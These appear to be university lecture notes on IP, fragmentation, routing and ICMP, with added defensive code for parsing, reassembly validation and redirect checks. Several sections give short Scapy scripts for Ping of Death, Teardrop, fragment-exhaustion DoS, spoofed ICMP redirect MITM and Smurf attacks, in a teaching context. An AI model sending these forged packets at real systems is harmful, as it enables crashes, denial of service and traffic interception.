CHAPTER 8: NETWORK LAYER - IP - ICMP AND ATTACKS

PART 1: NETWORK LAYER - BASIC CONCEPTS

1. ROLE & FUNCTIONS

Transports segments from the sending host to the receiving host:

Sender:

  • Encapsulates segments into datagrams
  • Passes them to the link layer

Receiver:

  • Delivers segments to transport layer protocol

Network layer protocols:

  • Present in EVERY Internet device: hosts, routers

Routers:

  • Examine header fields in all IP datagrams
  • Move datagrams from input ports to output ports
  • Transfer datagrams along the end-to-end path

2. TWO MAIN FUNCTIONS

A. FORWARDING

Definition:

  • Local, per-router function
  • Move packets from the router's input link to the appropriate output link

Analogy:

  • The process of getting through a single interchange

B. ROUTING

Definition:

  • Network-wide logic
  • Determine route taken by packets from source to destination
  • Uses routing algorithms

Analogy:

  • The process of planning a trip from source to destination

3. DATA PLANE VS CONTROL PLANE

A. DATA PLANE

Characteristics:

  • Local, per-router function
  • Determines how datagram arriving on router input port is forwarded to router output port
  • Uses forwarding table

B. CONTROL PLANE

Characteristics:

  • Network-wide logic
  • Determines how datagram is routed among routers along end-end path

Two approaches:

1. Traditional Routing Algorithms:

  • Implemented IN routers
  • Routing algorithm components in each router
  • Interact in control plane

2. Software-Defined Networking (SDN):

  • Implemented in REMOTE servers
  • Remote Controller computes, installs forwarding tables in routers
  • Centralized control

PART 2: IP PROTOCOL

1. IP DATAGRAM FORMAT

Header structure (20 bytes minimum):

[Ver | IHL | ToS | Total Length]
[Identification | Flags | Fragment Offset]
[TTL | Protocol | Header Checksum]
[Source IP Address]
[Destination IP Address]
[Options (if any)]
[Payload Data]

Important fields:

A. VERSION (4 bits)

  • IP protocol version number
  • IPv4 = 4

B. IHL - HEADER LENGTH (4 bits)

  • Header length in 32-bit words
  • Typically = 5 (5 × 4 = 20 bytes)

C. TYPE OF SERVICE (8 bits)

  • DiffServ (bits 0:5)
  • ECN (bits 6:7)

D. TOTAL LENGTH (16 bits)

  • Total datagram length in bytes
  • Maximum: 65,535 bytes (64KB)
  • Typically: 1500 bytes or less
  • Question: Can we overflow this value? → Attacks!

E. IDENTIFICATION (16 bits)

  • Unique ID for each datagram
  • Used for fragmentation/reassembly

F. FLAGS (3 bits)

  • Bit 0: Reserved (must be 0)
  • Bit 1: DF (Don’t Fragment)
  • Bit 2: MF (More Fragments)

G. FRAGMENT OFFSET (13 bits)

  • Position of the fragment within the original datagram
  • Unit: 8-byte blocks
  • Why ÷ 8? To save bits!

H. TIME-TO-LIVE (TTL) (8 bits)

  • Remaining max hops
  • Decremented at each router
  • When TTL = 0 → router drops packet, sends ICMP Time Exceeded

I. PROTOCOL (8 bits)

  • Upper layer protocol
  • 6 = TCP
  • 17 = UDP
  • 1 = ICMP

J. HEADER CHECKSUM (16 bits)

  • Error detection for the header only (NOT the payload)

K. SOURCE IP ADDRESS (32 bits)

  • Sender’s IP

L. DESTINATION IP ADDRESS (32 bits)

  • Receiver’s IP

M. OPTIONS (variable)

  • Timestamp, record route taken, etc.

Overhead:

  • 20 bytes IP + 20 bytes TCP = 40 bytes + app layer overhead
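Added example (not from these notes): a parser for the IPv4 header laid out above, using only the Python standard library. It decodes every field listed, verifies the header checksum exactly as the notes describe it (header only, payload not covered), and includes a small builder so the sample input is constructed inline; the addresses and field values in SAMPLE are made up for the example.

```python
import struct

def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's-complement of the one's-complement sum of
    the header's 16-bit words. Over a header whose checksum field is already
    filled in, the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def parse_ipv4_header(pkt: bytes) -> dict:
    """Decode the IPv4 header fields listed above; raise ValueError on malformed input."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F
    if version != 4 or ihl < 5:
        raise ValueError("not a valid IPv4 header")
    hdr_len = ihl * 4                        # IHL is in 32-bit words
    if len(pkt) < hdr_len or total_len < hdr_len:
        raise ValueError("header length exceeds packet or total length")
    return {
        "version": version,
        "ihl": ihl,
        "dscp": tos >> 2,                    # DiffServ, ToS bits 0:5
        "ecn": tos & 0x03,                   # ECN, ToS bits 6:7
        "total_length": total_len,
        "id": ident,
        "df": bool(flags_frag & 0x4000),     # flags bit 1: Don't Fragment
        "mf": bool(flags_frag & 0x2000),     # flags bit 2: More Fragments
        "frag_offset": flags_frag & 0x1FFF,  # 13 bits, unit = 8-byte blocks
        "ttl": ttl,
        "protocol": proto,                   # 1 = ICMP, 6 = TCP, 17 = UDP
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
        "checksum_ok": ipv4_checksum(pkt[:hdr_len]) == 0,  # header only, never payload
        "options": pkt[20:hdr_len],
    }

def build_ipv4_header(src, dst, payload_len, proto=17, ident=0, ttl=64,
                      df=False, mf=False, frag_offset=0) -> bytes:
    """Assemble a 20-byte header (no options) with a correct checksum."""
    flags_frag = (0x4000 if df else 0) | (0x2000 if mf else 0) | (frag_offset & 0x1FFF)
    src_b = bytes(int(x) for x in src.split("."))
    dst_b = bytes(int(x) for x in dst.split("."))
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                      flags_frag, ttl, proto, 0, src_b, dst_b)
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]

# Constructed sample: first fragment of a UDP datagram between two lab-style addresses
SAMPLE = build_ipv4_header("10.0.2.15", "10.9.0.5", payload_len=100,
                           ident=1000, mf=True)

if __name__ == "__main__":
    for k, v in parse_ipv4_header(SAMPLE).items():
        print(f"{k:13} {v}")
```

Flipping a single bit in the sample (for instance in the TTL byte) makes checksum_ok False, which is all the header checksum protects: a corrupted payload passes through unnoticed at the IP layer.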

2. TTL AND TRACEROUTE

TTL (Time To Live):

  • Purpose: prevent infinite loops
  • Decremented at each router
  • When TTL = 0 → router drops, sends ICMP Type 11 Code 0 (Time Exceeded)

How traceroute works:

Steps:

  1. Source sends sets of UDP segments to destination:

    • 1st set: TTL = 1
    • 2nd set: TTL = 2
    • 3rd set: TTL = 3, etc.
  2. The datagram in the nth set arrives at the nth router:

    • Router discards datagram
    • Sends source ICMP message (Type 11, Code 0)
    • ICMP message includes name of router & IP address
  3. When ICMP arrives at source:

    • Record RTTs (Round Trip Times)

Stopping criteria:

  • UDP segment arrives at destination host
  • Destination returns ICMP “port unreachable” (Type 3, Code 3)
  • Source stops
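Added example (not from these notes): a small model of the steps above, so the TTL / ICMP interplay can be stepped through without a network. Routers decrement TTL and answer Time Exceeded (Type 11, Code 0) when it hits zero; the destination answers Port Unreachable (Type 3, Code 3), which is the stopping criterion. The path and its addresses are constructed for the example.

```python
from dataclasses import dataclass

TIME_EXCEEDED = (11, 0)        # ICMP Type 11, Code 0
PORT_UNREACHABLE = (3, 3)      # ICMP Type 3, Code 3

@dataclass
class Hop:
    ip: str
    is_destination: bool = False

# Constructed path: three routers, then the destination host
PATH = [Hop("10.0.1.1"), Hop("10.0.2.1"), Hop("10.0.3.1"),
        Hop("192.168.60.5", is_destination=True)]

def deliver(path, ttl):
    """Carry one UDP probe along the path. Each router decrements TTL; the
    router that brings it to 0 discards the probe and answers Time Exceeded.
    A probe that reaches the destination (no UDP listener on the probe port)
    gets Port Unreachable. Returns ((type, code), responder_ip)."""
    for hop in path:
        if hop.is_destination:
            return PORT_UNREACHABLE, hop.ip
        ttl -= 1
        if ttl == 0:
            return TIME_EXCEEDED, hop.ip
    raise RuntimeError("path does not end at a destination")

def traceroute(path, max_hops=30):
    """Send probes with TTL = 1, 2, 3, ... and record who answered each one."""
    hops = []
    for ttl in range(1, max_hops + 1):
        (itype, icode), responder = deliver(path, ttl)
        hops.append((ttl, responder, itype, icode))
        if (itype, icode) == PORT_UNREACHABLE:   # stopping criterion
            break
    return hops

if __name__ == "__main__":
    for ttl, ip, t, c in traceroute(PATH):
        print(f"{ttl:2d}  {ip:15}  ICMP type {t} code {c}")
```

The responder address of each hop is exactly what real traceroute prints per line; max_hops is the safety limit that stops the probing when no Port Unreachable ever arrives (firewall drops, routing loop).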

PART 3: IP FRAGMENTATION

1. CONCEPT

Why is fragmentation needed?

  • Network links have an MTU (Max Transfer Size), the largest possible link-level frame
  • Different link types have different MTUs
  • e.g., Ethernet = 1500 bytes

Process:

  • Large IP datagram divided (“fragmented”) within net
  • One datagram → several datagrams
  • Reassembled ONLY at destination (NOT at intermediate routers!)
  • IP header bits are used to identify and order related fragments

2. FRAGMENTATION EXAMPLE

Scenario: 4000-byte datagram, MTU = 1500 bytes

Original datagram:

ID = x
Offset = 0
Flag = 0
Length = 4000

After fragmentation:

Fragment 1:

ID = x
Offset = 0
Flag = 1 (More Fragments)
Length = 1500
Data = 1480 bytes (1500 - 20 header)

Fragment 2:

ID = x
Offset = 185 (1480 ÷ 8)
Flag = 1
Length = 1500
Data = 1480 bytes

Fragment 3:

ID = x
Offset = 370 (2960 ÷ 8)
Flag = 0 (Last Fragment)
Length = 1040
Data = 1020 bytes

Note:

  • Offset = data_bytes ÷ 8
  • Fragment 1: offset = 0
  • Fragment 2: offset = 1480 ÷ 8 = 185
  • Fragment 3: offset = (1480 + 1480) ÷ 8 = 370

Why offset ÷ 8?

  • The offset field has only 13 bits
  • Max value = 8191
  • Without ÷ 8 → could only address 8191 bytes
  • With ÷ 8 → can address 8191 × 8 = 65,528 bytes (nearly 64KB)
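Added example (not from these notes): the fragmentation arithmetic from the worked example above as a general function, so any datagram size and MTU can be checked, not just 4000 bytes over Ethernet. It works on header-field values only (nothing is sent); the 20-byte header size and the 8-byte offset unit follow the field definitions in Part 2.

```python
IP_HDR = 20                   # header size assumed throughout (no options)
MAX_OFFSET = (1 << 13) - 1    # the Fragment Offset field is 13 bits: 0..8191

def fragment(total_length, mtu, ident, hdr_len=IP_HDR):
    """Split a datagram of total_length bytes so every piece fits mtu.
    Each entry: id, offset (8-byte blocks), mf flag, length (with header), data bytes."""
    if mtu < hdr_len + 8:
        raise ValueError("MTU too small to carry 8 bytes of fragment data")
    if total_length < hdr_len:
        raise ValueError("total length smaller than the header")
    data_total = total_length - hdr_len
    per_frag = (mtu - hdr_len) // 8 * 8     # non-final fragments carry a multiple of 8 bytes
    frags, sent = [], 0
    while sent < data_total or not frags:   # a zero-length payload still yields one fragment
        chunk = min(per_frag, data_total - sent)
        offset = sent // 8                  # byte position expressed in 8-byte blocks
        if offset > MAX_OFFSET:
            raise ValueError("offset does not fit in 13 bits")
        last = sent + chunk >= data_total
        frags.append({"id": ident, "offset": offset, "mf": 0 if last else 1,
                      "length": hdr_len + chunk, "data": chunk})
        sent += chunk
        if last:
            break
    return frags

if __name__ == "__main__":
    for f in fragment(4000, 1500, ident=0x1234):
        print(f)
```

For the notes' scenario this reproduces offsets 0 / 185 / 370, lengths 1500 / 1500 / 1040 and MF flags 1 / 1 / 0. Because every fragment re-carries a 20-byte header, a maximum-size 65,535-byte datagram over a 1500-byte MTU needs 45 fragments, and its last offset (8140) stays within the 13-bit field, which is why ÷ 8 is sufficient.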

3. CONSTRUCTING IP FRAGMENTS WITH SCAPY

from scapy.all import *

# Fragment 1: carries the UDP header plus 1000 bytes of data (1008 bytes of IP payload)
ip1 = IP(dst="10.9.0.5", id=1000, flags=1, frag=0, proto=17)
udp = UDP(sport=7070, dport=9090)
udp.len = 8 + 1000 + 500   # UDP length covers the data of ALL fragments, not just this one
udp.chksum = 0             # no checksum (allowed for UDP/IPv4); one computed over fragment 1 alone would not match the reassembled datagram
data1 = "A" * 1000
pkt1 = ip1/udp/data1

# Fragment 2: offset in 8-byte units = 1008 / 8 = 126 (the UDP header counts as IP payload)
ip2 = IP(dst="10.9.0.5", id=1000, flags=0, frag=126, proto=17)
data2 = "B" * 500
pkt2 = ip2/Raw(load=data2)

send(pkt1)
send(pkt2)

Explanation:

  • flags = 1: More Fragments
  • flags = 0: Last Fragment
  • frag = offset value
  • proto = 17: UDP
  • id must be the same for all fragments

PART 4: ATTACKS USING IP FRAGMENTATION

1. PROTOCOL VIOLATION

Concept:

  • Protocols Are Rules
  • Attackers Like to Break Rules
  • Robust Programs Must Handle Rule Violations

Attack questions:

Q1: Can you create IP packet larger than 65,536 bytes (64KB)?

Q2: Can you create abnormal conditions using offset and payload size?

Q3: Can you use small bandwidth to tie up target’s significant resources?

2. PING OF DEATH (PoD) ATTACK

Attack 1: Create Super-Large Packet

Idea: Violate IP protocol → buffer overflow

Method:

  • Last fragment has:
    • offset = (65536 - 8) ÷ 8 = 8191
    • total_length = 1000

Calculation:

Real size = offset × 8 + (total_length - 20 - 8)
          = 65528 + 972
          = 66,500 bytes > 65,536 bytes!

Result:

  • Exceeds the max IP packet size
  • Cause buffer overflow at victim
  • System crash

Code example:

from scapy.all import *

# Create super-large packet
ip = IP(dst="victim_ip")
icmp = ICMP()

# Last fragment
ip_frag = IP(dst="victim_ip", id=12345, flags=0, frag=8191)
payload = "X" * 1000
pkt = ip_frag/ICMP()/payload

send(pkt)

Recent PoD vulnerability:

  • CVE-2020-16898 (Windows TCP/IP Stack)
  • ICMPv6 Router Advertisement packets
  • Remote Code Execution!

Mitigation:

  • Validate total reassembled packet size
  • Drop packets exceeding limits
  • Update/patch systems

3. TEARDROP ATTACK

Attack 2: Create Abnormal Situations

Goal: Test whether computer can handle overlapping fragments

Normal fragments:

Fragment 1: offset = 0,   length = 820
Fragment 2: offset = 200, length = 820

Check:

End of Fragment 1 = 0 + 820 = 820
Start of Fragment 2 = 200 × 8 = 1600
Gap = 1600 - 820 = 780 bytes → OK!

Teardrop attack:

Fragment 1: offset = 0,   length = 820
Fragment 2: offset = 600, length = 820

Check:

End of Fragment 1 = 0 + 820 = 820
Start of Fragment 2 = 600 × 8 = 4800
Overlap = 820 - 4800 = -3980 (NEGATIVE!)

Result:

  • Negative overlap → HUGE unsigned value
  • Cannot reassemble
  • System crash or unexpected behavior

Code:

from scapy.all import *

# Fragment 1
ip1 = IP(dst="victim", id=1000, flags=1, frag=0)
data1 = "A" * 800
pkt1 = ip1/ICMP()/data1

# Fragment 2 - OVERLAPPING!
ip2 = IP(dst="victim", id=1000, flags=0, frag=600)
data2 = "B" * 800
pkt2 = ip2/Raw(load=data2)

send(pkt1)
send(pkt2)

4. DENIAL OF SERVICE (DoS) WITH FRAGMENTATION

Attack 3: Tie Up Target’s Resources

Idea: Small bandwidth → significant resources

Method:

Packet 1: offset = 0 (first fragment)
Packet 2: offset ≈ 65535 ÷ 8 (last fragment)

Impact:

Approach 1 (Static buffer):

  • Target allocates a 64KB buffer and waits for all fragments
  • Send 2 tiny packets (~100 bytes each)
  • Tie up 64KB resources on server!

Approach 2 (Linked list):

  • More complicated, takes more time to implement
  • Still consumes resources

Result:

  • Very efficient DoS attack
  • Small bandwidth → Large resource consumption

Code:

from scapy.all import *

# Fragment 1 - first
ip1 = IP(dst="victim", id=1000, flags=1, frag=0)
pkt1 = ip1/ICMP()/"A"*50

# Fragment 2 - last (huge offset!)
ip2 = IP(dst="victim", id=1000, flags=0, frag=8190)
pkt2 = ip2/Raw(load="B"*50)

send(pkt1)
send(pkt2)
# Target allocates 64KB buffer, waits forever for middle fragments!
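Added example (not from these notes): a receiver-side fragment validator that applies the mitigations this part calls for, against all three attacks. It rejects any fragment whose offset × 8 + data would push the reassembled datagram past 65,535 bytes (Ping of Death), rejects fragments that overlap data already received (Teardrop), and bounds what an incomplete fragment set can cost (the fragmentation DoS) by storing only the bytes actually received instead of a 64KB buffer, capping the number of pending sets, and expiring them on a timeout. The cap and timeout values are assumptions chosen for the example; the sample fragments are constructed records, not real packets.

```python
import time

MAX_DATAGRAM = 65535       # 16-bit Total Length, header included
IP_HDR = 20
MAX_PENDING_SETS = 64      # assumed cap on concurrent reassembly contexts
REASSEMBLY_TIMEOUT = 30.0  # assumed seconds before an incomplete set is discarded

class FragmentSet:
    def __init__(self, now):
        self.pieces = {}   # start byte -> data; only bytes actually received are stored
        self.total = None  # data length, known once the MF=0 fragment arrives
        self.created = now

class Reassembler:
    def __init__(self):
        self.pending = {}  # (src, dst, id, proto) -> FragmentSet
        self.rejected = [] # (key, reason): what a sensor would log

    def accept(self, frag, now=None):
        """frag: dict with src, dst, id, proto, offset (8-byte units), mf, data (bytes).
        Returns the reassembled payload when the set completes, else None."""
        now = time.time() if now is None else now
        self._expire(now)
        key = (frag["src"], frag["dst"], frag["id"], frag["proto"])
        start = frag["offset"] * 8
        end = start + len(frag["data"])

        # Ping of Death: offset*8 + data + header must fit the 16-bit Total Length
        if end + IP_HDR > MAX_DATAGRAM:
            return self._reject(key, "reassembled size exceeds 65535")
        if frag["mf"] and len(frag["data"]) % 8:
            return self._reject(key, "non-final fragment length not a multiple of 8")

        fs = self.pending.get(key)
        if fs is None:
            if len(self.pending) >= MAX_PENDING_SETS:    # bound resource use
                return self._reject(key, "too many pending fragment sets")
            fs = self.pending[key] = FragmentSet(now)

        # Teardrop: a fragment that intersects already-stored data is a violation
        for s, d in fs.pieces.items():
            if start < s + len(d) and s < end:
                return self._drop_set(key, "overlapping fragment")
        if not frag["mf"]:
            if fs.total is not None:
                return self._drop_set(key, "second final fragment")
            if any(s + len(d) > end for s, d in fs.pieces.items()):
                return self._drop_set(key, "data beyond final fragment")
            fs.total = end
        elif fs.total is not None and end > fs.total:
            return self._drop_set(key, "data beyond final fragment")
        fs.pieces[start] = frag["data"]

        # complete only when the pieces cover [0, total) with no holes
        if fs.total is not None:
            covered = 0
            for s in sorted(fs.pieces):
                if s != covered:
                    return None                          # hole: keep waiting
                covered = s + len(fs.pieces[s])
            if covered == fs.total:
                del self.pending[key]
                return b"".join(fs.pieces[s] for s in sorted(fs.pieces))
        return None

    def _reject(self, key, reason):
        self.rejected.append((key, reason))
        return None

    def _drop_set(self, key, reason):
        self.pending.pop(key, None)
        return self._reject(key, reason)

    def _expire(self, now):
        stale = [k for k, fs in self.pending.items() if now - fs.created > REASSEMBLY_TIMEOUT]
        for k in stale:
            self._drop_set(k, "reassembly timeout")

def make_fragment(offset, mf, data, ident=1000, src="10.0.2.5", dst="10.9.0.5", proto=1):
    """Constructed fragment record for the example (not a real packet)."""
    return {"src": src, "dst": dst, "id": ident, "proto": proto,
            "offset": offset, "mf": mf, "data": data}
```

Note that with a 20-byte header the largest usable offset is 8189 (8189 × 8 = 65,512), so the offset 8191 used by the Ping of Death calculation, and 8190 used by the DoS fragment, can never belong to a legal datagram; the size check alone discards both before any buffer is touched.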

PART 5: ROUTING

1. ROUTING TABLE

Linux routing commands:

Show routing table:

ip route

Add route:

sudo ip route add 192.168.60.0/24 dev enp0s3 via 10.0.2.7

Delete route:

sudo ip route del 192.168.60.0/24

2. ROUTING RULES - LONGEST MATCH

Example routing table:

A: 0.0.0.0/0         dev interface-a  (default route)
B: 192.168.0.0/16    dev interface-b
C: 192.168.60.0/24   dev interface-a
D: 192.168.60.5/32   dev interface-d

Question: Which interface is used for:

1. 192.200.60.5?

  • Match: A (0.0.0.0/0)
  • Answer: interface-a (default route)

2. 192.168.30.5?

  • Match: A (0.0.0.0/0), B (192.168.0.0/16)
  • Longest match: B (/16 > /0)
  • Answer: interface-b

3. 192.168.60.5?

  • Match: A (0.0.0.0/0), B (192.168.0.0/16), C (192.168.60.0/24), D (192.168.60.5/32)
  • Longest match: D (/32 > /24 > /16 > /0)
  • Answer: interface-d

Bottom line: Pick the LONGEST MATCH!

3. ROUTING TABLE CONFIGURATION

For Routers:

  • Routing protocols (e.g., OSPF, BGP)
  • Attacks on routing protocols (will be discussed)

For Hosts (tiny routing table):

  • DHCP (IP, DNS, router info)
  • Default routers
  • Manual configuration (static routes)
  • ICMP redirect messages

4. REVERSE PATH FILTERING (RPF)

Threat: Spoofing from outside network

  • Outside attacker uses an internal source IP
  • Pretending to be inside → cause damage

Router’s protection: RPF

Symmetric routing:

  1. Router R receives packet from interface A
  2. Do a reverse lookup: does the return path to src_ip go out through the same interface A?
    • YES → Allow (symmetric)
    • NO → Drop (asymmetric)

Related term: Reverse-Path Forwarding (RPF)

Note:

  • Very obscure and important rule inside Linux Kernel
  • Provides protection against packet spoofing

Demo - spoofing that RPF will drop:

from scapy.all import *

# Spoof packet from outside with internal src IP
ip = IP(src="10.0.2.5", dst="192.168.60.5")  # Internal src, external dst
send(ip/ICMP())
# The router drops it because the reverse path does not match the incoming interface!
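Added example (not from these notes): the longest-prefix-match lookup from section 2 and the reverse-path check from section 4, built on the same routing table, since RPF is nothing more than a lookup on the source address followed by an interface comparison. The table rows are the ones in the notes; the packet addresses used in the tests are constructed.

```python
import ipaddress

# Routing table from the example above: (prefix, interface)
ROUTES = [
    ("0.0.0.0/0", "interface-a"),        # A: default route
    ("192.168.0.0/16", "interface-b"),   # B
    ("192.168.60.0/24", "interface-a"),  # C
    ("192.168.60.5/32", "interface-d"),  # D
]

def lookup(dst, routes=ROUTES):
    """Longest-prefix match: among all routes containing dst, pick the one
    with the most prefix bits. Returns (prefix, interface) or None."""
    addr = ipaddress.ip_address(dst)
    best = None
    for prefix, iface in routes:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return (str(best[0]), best[1]) if best else None

def rpf_allows(src, in_iface, routes=ROUTES):
    """Reverse path check: would a reply to src leave through in_iface?
    Same interface = symmetric = allow; otherwise the source is suspect."""
    route = lookup(src, routes)
    return route is not None and route[1] == in_iface

def handle_packet(src, dst, in_iface, routes=ROUTES):
    """Router decision for one datagram: RPF on the source first, then
    forward the destination by longest match."""
    if not rpf_allows(src, in_iface, routes):
        return ("drop", "RPF: reverse path to %s is not via %s" % (src, in_iface))
    route = lookup(dst, routes)
    if route is None:
        return ("drop", "no route to %s" % dst)
    return ("forward", route[1])

if __name__ == "__main__":
    for probe in ("192.200.60.5", "192.168.30.5", "192.168.60.5"):
        print(probe, "->", lookup(probe))
    print(handle_packet("192.168.60.5", "192.168.30.5", "interface-a"))
```

One caveat the table makes visible: because the default route points at interface-a, any source address without a more specific route passes RPF on that interface. RPF stops outsiders from claiming an inside address (a /16, /24 or /32 that points elsewhere); it cannot validate arbitrary external sources.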

PART 6: ICMP PROTOCOL

1. PURPOSE

ICMP (Internet Control Message Protocol):

  • Used by hosts and routers to communicate network-level information

Functions:

Error reporting:

  • Unreachable host, network, port, protocol
  • Time exceeded (TTL = 0)

Control messages:

  • Echo request/reply (ping)
  • Redirect
  • Timestamp request/reply
  • Router advertisement/solicitation

Characteristics:

  • ICMP messages carried in IP datagrams
  • ICMP message: type, code + first 8 bytes of IP datagram causing error

2. ICMP MESSAGE TYPES

Important types:

Type  Code  Description
  0     0   Echo Reply (ping)
  3     0   Dest Network Unreachable
  3     1   Dest Host Unreachable
  3     2   Dest Protocol Unreachable
  3     3   Dest Port Unreachable
  3     6   Dest Network Unknown
  3     7   Dest Host Unknown
  4     0   Source Quench (congestion - deprecated)
  8     0   Echo Request (ping)
  9     0   Router Advertisement
 10     0   Router Discovery
 11     0   TTL Expired
 12     0   Bad IP Header

3. ICMP ECHO REQUEST/REPLY (PING)

Workflow:

Host A → Echo Request (Type 8) → Host B
Host B → Echo Reply (Type 0) → Host A

Scapy:

from scapy.all import *

# Echo Request
ip = IP(dst="10.9.0.5")
icmp = ICMP(type=8, code=0)
send(ip/icmp)

# Echo Reply
ip = IP(dst="10.9.0.6")
icmp = ICMP(type=0, code=0)
send(ip/icmp)

4. ICMP TIME EXCEEDED

When TTL = 0:

  • Router drops packet
  • Sends ICMP Type 11, Code 0 (Time Exceeded) to source
  • Includes first 8 bytes of original IP datagram

Used by traceroute!

5. ICMP DESTINATION UNREACHABLE

Type 3, various codes:

  • Code 0: Network Unreachable
  • Code 1: Host Unreachable
  • Code 2: Protocol Unreachable
  • Code 3: Port Unreachable (UDP port not listening)

6. ICMP REDIRECT

Purpose: tell a host about a better route

Scenario:

Host A → Router R1 → Router R2 → Host B

R1 knows: Better route = direct to R2
R1 sends ICMP Redirect to A: "Use R2 for B"

ICMP Redirect message:

  • Type 5, Code 0
  • Contains: Better gateway IP address

Scapy:

from scapy.all import *

# A redirect carries the header of the datagram that triggered it
# (here: the host's own packet toward 192.168.60.5)
original_ip_header = IP(src="10.9.0.5", dst="192.168.60.5")/ICMP()

ip = IP(src="10.9.0.11", dst="10.9.0.5")  # Router → Host
icmp = ICMP(type=5, code=0)
icmp.gw = "10.9.0.111"  # New gateway IP
send(ip/icmp/original_ip_header)

Attacker → MITM Attack using ICMP Redirect!

PART 7: ICMP REDIRECT ATTACK

1. ATTACK CODE

#!/usr/bin/env python3
from scapy.all import *

# Victim: 10.9.0.5
# Fake gateway: 10.9.0.111 (attacker-controlled)
# Original gateway: 10.9.0.11

# Spoof ICMP Redirect from gateway to victim
ip = IP(src="10.9.0.11", dst="10.9.0.5")
icmp = ICMP(type=5, code=0)
icmp.gw = "10.9.0.111"  # Redirect to attacker

# Include original IP header (first 8 bytes of triggering packet)
# Victim was sending to some destination
orig_ip = IP(src="10.9.0.5", dst="192.168.60.5")
orig_icmp = ICMP()

send(ip/icmp/orig_ip/orig_icmp)

Result:

  • Victim updates routing table
  • Traffic to 192.168.60.0/24 → goes through 10.9.0.111 (attacker)
  • MITM attack!

2. LIMITATIONS

Question 1: Can you launch ICMP redirect from remote computer?

Answer: NO!

  • When receiving ICMP Redirect, host checks if gateway is on same network
  • If NOT → ignore

Question 2: Can you redirect to remote computer?

Answer: NO!

  • Reverse Path Filtering (RPF) at router will drop spoofed packets
  • New gateway must be on the same subnet

Bottom line:

  • ICMP Redirect only works locally (same LAN)
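Added example (not from these notes): the host side of the limitations just listed, as code. It decodes an ICMP message from raw bytes (type, code, and for Type 5 the gateway field) and then applies the checks a host makes before honouring a redirect: the proposed gateway must be on the local subnet (the check the notes describe), and the message must come from the host's current first-hop router (an additional requirement from RFC 1122). A flag models the hardened configuration in which redirects are ignored altogether; on Linux that corresponds to net.ipv4.conf.all.accept_redirects = 0. The addresses follow the lab addresses in the notes; the host's subnet (10.9.0.0/24) and the sample messages are constructed.

```python
import ipaddress
import struct

def parse_icmp(payload: bytes) -> dict:
    """Decode the 8-byte ICMP header; whatever follows (for error messages,
    the IP header + 8 bytes of the datagram that caused it) is returned as 'data'."""
    if len(payload) < 8:
        raise ValueError("ICMP header is 8 bytes")
    itype, code, csum, rest = struct.unpack("!BBH4s", payload[:8])
    msg = {"type": itype, "code": code, "checksum": csum, "data": payload[8:]}
    if itype == 5:                           # Redirect: bytes 4..7 hold the gateway
        msg["gateway"] = str(ipaddress.IPv4Address(rest))
    elif itype in (0, 8):                    # Echo reply/request: identifier, sequence
        msg["id"], msg["seq"] = struct.unpack("!HH", rest)
    return msg

class HostRedirectPolicy:
    """Host-side handling of ICMP Redirect (Type 5)."""
    def __init__(self, local_net, default_gw, accept_redirects=True):
        self.local_net = ipaddress.ip_network(local_net)
        self.default_gw = ipaddress.ip_address(default_gw)
        self.accept_redirects = accept_redirects
        self.host_routes = {}                # destination -> gateway learned from redirects

    def handle(self, sender_ip, icmp_payload):
        """Return (accepted, reason) for one received ICMP message."""
        msg = parse_icmp(icmp_payload)
        if msg["type"] != 5:
            return False, "not a redirect"
        if not self.accept_redirects:
            return False, "redirects disabled on this host"
        if ipaddress.ip_address(sender_ip) != self.default_gw:
            return False, "sender is not the current first-hop router"
        gw = ipaddress.ip_address(msg["gateway"])
        if gw not in self.local_net:         # a remote gateway can never be next hop
            return False, "proposed gateway is not on the local subnet"
        if len(msg["data"]) < 20:
            return False, "missing embedded IP header"
        dst = str(ipaddress.IPv4Address(msg["data"][16:20]))  # destination of the triggering packet
        self.host_routes[dst] = str(gw)
        return True, "host route %s via %s" % (dst, gw)

def build_redirect(gateway, orig_src, orig_dst) -> bytes:
    """Constructed Type 5/Code 0 message (checksum left at 0) carrying the
    20-byte IP header of the datagram that triggered it."""
    embedded = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, 1, 0,
                           ipaddress.IPv4Address(orig_src).packed,
                           ipaddress.IPv4Address(orig_dst).packed)
    return struct.pack("!BBH4s", 5, 0, 0, ipaddress.IPv4Address(gateway).packed) + embedded

if __name__ == "__main__":
    host = HostRedirectPolicy("10.9.0.0/24", "10.9.0.11")
    print(host.handle("10.9.0.11", build_redirect("10.9.0.111", "10.9.0.5", "192.168.60.5")))
    print(host.handle("10.9.0.11", build_redirect("192.168.60.1", "10.9.0.5", "192.168.60.5")))
```

The sender check only helps against messages that are not spoofed: the attack code in Part 7 forges the gateway's own source address from inside the LAN, which passes it. That is why the subnet check is what confines the attack to the local network, and why disabling redirect acceptance is the robust setting on hosts that do not need them.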

PART 8: DoS ATTACKS USING ICMP

1. SMURF ATTACK

Attack idea:

Step 1: Spoof ICMP Echo Request

  • Source IP = Victim’s IP (spoofed!)
  • Destination = Broadcast address (e.g., 10.9.0.255)

Step 2: All hosts on network receive

  • Think victim sent Echo Request
  • All reply to victim with Echo Reply!

Step 3: Victim overwhelmed

  • Receives hundreds/thousands of Echo Replies
  • Denial of Service!

Diagram:

Attacker → Spoofed Echo Request (src=Victim, dst=Broadcast)
         → All hosts on network receive
         → All hosts reply to Victim
         → Victim OVERWHELMED!

Code:

from scapy.all import *

# Smurf attack
ip = IP(src="victim_ip", dst="10.9.0.255")  # Broadcast
icmp = ICMP(type=8)  # Echo Request
send(ip/icmp)

# All hosts reply to victim!

Demo: Ping broadcast address

ping -b 10.9.0.255
# What happened?

Prevention:

  • Configure routers to NOT forward broadcast packets
  • Disable ICMP Echo Reply to broadcast addresses
